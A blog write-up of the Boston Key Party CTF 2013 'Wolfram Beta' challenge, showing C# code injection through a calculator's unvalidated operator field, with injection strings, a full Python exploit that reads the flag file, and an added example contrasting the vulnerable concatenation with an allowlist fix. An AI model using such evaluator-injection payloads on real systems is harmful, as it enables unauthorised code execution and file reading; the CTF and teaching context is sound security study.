Monday, June 10, 2013

Boston Key Party CTF 2013 - Wolfram Beta writeup

We have a simple remote calculator on 54.218.12.97:34567 that reads three inputs: number1, operation and number2.
Let's send a few values and symbols to see how it behaves.
If number1 or number2 is not a number, the calculator replies: Hey, numbers only. This is just a calculator.
The operation value, however, may contain any symbols. My attempt to inject "+123+" as the operation value was successful.
From the exception message I understood that the calculator passes the assembled expression to the Mono.CSharp.Evaluator.Evaluate method. Here is the exception:
Unhandled Exception: System.ArgumentException: The expression did not set a result    
at Mono.CSharp.Evaluator.Evaluate (System.String input) [0x00000] in :0     
at wolfram_beta.MainClass.ReplCalculator () [0x00000] in :0     
at wolfram_beta.MainClass.Main (System.String[] args) [0x00000] in :0   
[ERROR] FATAL UNHANDLED EXCEPTION: 
System.ArgumentException: The expression did not set a result    
at Mono.CSharp.Evaluator.Evaluate (System.String input) [0x00000] in :0     
at wolfram_beta.MainClass.ReplCalculator () [0x00000] in :0     
at wolfram_beta.MainClass.Main (System.String[] args) [0x00000] in :0

To find a "flag" file, let's list the files in the current directory using the following injection in the operation value:
op = '==1; foreach (var dir in System.IO.Directory.GetFiles(System.IO.Directory.GetCurrentDirectory())) System.Console.WriteLine(dir); 31337+'
Awesome! The flag file is found :)
/home/wbeta/flag
Now we just need to read it.
Here is the full exploit code:
import socket

HOST, PORT = "54.218.12.97", 34567

s = socket.socket()
s.connect((HOST, PORT))


def recv_print(sock):
    """Read one chunk from the server, echo it, and return it as text."""
    data = sock.recv(1024).decode(errors="replace")
    print(data, end="")
    return data


# receive calculator info
recv_print(s)
recv_print(s)

# set numbers and operation: only the numbers are validated, so the
# payload goes into the operator and "0 op 0" becomes
# "0==1; System.Console.WriteLine(...); 31337+0"
n1 = '0'
n2 = '0'
op = '==1; System.Console.WriteLine(System.IO.File.ReadAllText("/home/wbeta/flag")); 31337+'

# send nums and op
s.sendall((n1 + '\n').encode())
recv_print(s)
s.sendall((op + '\n').encode())
recv_print(s)
s.sendall((n2 + '\n').encode())
recv_print(s)

# thinking...
data = recv_print(s)
while 'Done Thinking!' not in data:
    data = recv_print(s)

# receive result
recv_print(s)

Done! The flag is received: at_least_its_not_a_python_jail
It's not a python jail :)
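To show where the calculator goes wrong, here is an added example (not part of the original writeup or the challenge source): build_expression models a calculator that validates the numbers but concatenates the raw operator into a string for an evaluator, while safe_calculate looks the operator up in an allowlist so no user-controlled string is ever evaluated. The function names, the number regex and the allowlist are assumptions of this example.

```python
import operator
import re

# Operators the calculator should accept, mapped to real functions.
# Anything not in this table is rejected instead of being evaluated.
OPERATORS = {
    "+": operator.add,
    "-": operator.sub,
    "*": operator.mul,
    "/": operator.truediv,
}

NUMBER_RE = re.compile(r"^-?\d+(\.\d+)?$")
NUMBERS_ONLY = "Hey, numbers only. This is just a calculator."


def check_numbers(n1, n2):
    """The check the challenge applies to number1 and number2 only."""
    for n in (n1, n2):
        if not NUMBER_RE.match(n):
            raise ValueError(NUMBERS_ONLY)


def build_expression(n1, op, n2):
    """Vulnerable pattern: the operator field is concatenated unchecked, so
    the string handed to an evaluator such as Mono.CSharp.Evaluator.Evaluate
    can contain whole statements. Returned, never evaluated, here."""
    check_numbers(n1, n2)
    return n1 + op + n2


def safe_calculate(n1, op, n2):
    """Hardened version: operator allowlist plus explicit numeric conversion,
    so no string reaches an evaluator at all."""
    check_numbers(n1, n2)
    if op not in OPERATORS:
        raise ValueError("Unknown operator: %r" % op)
    return OPERATORS[op](float(n1), float(n2))


def is_rejected(fn, *args):
    """True if the calculator refuses the input (shows what each check catches)."""
    try:
        fn(*args)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    payload = '==1; System.Console.WriteLine("injected"); 31337+'
    # "0 <payload> 0" becomes a C# statement list whose last expression,
    # 31337+0, is what sets the evaluator's result.
    print(build_expression("0", payload, "0"))
    print(safe_calculate("2", "*", "21"))
    print("rejected:", is_rejected(safe_calculate, "0", payload, "0"))
```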
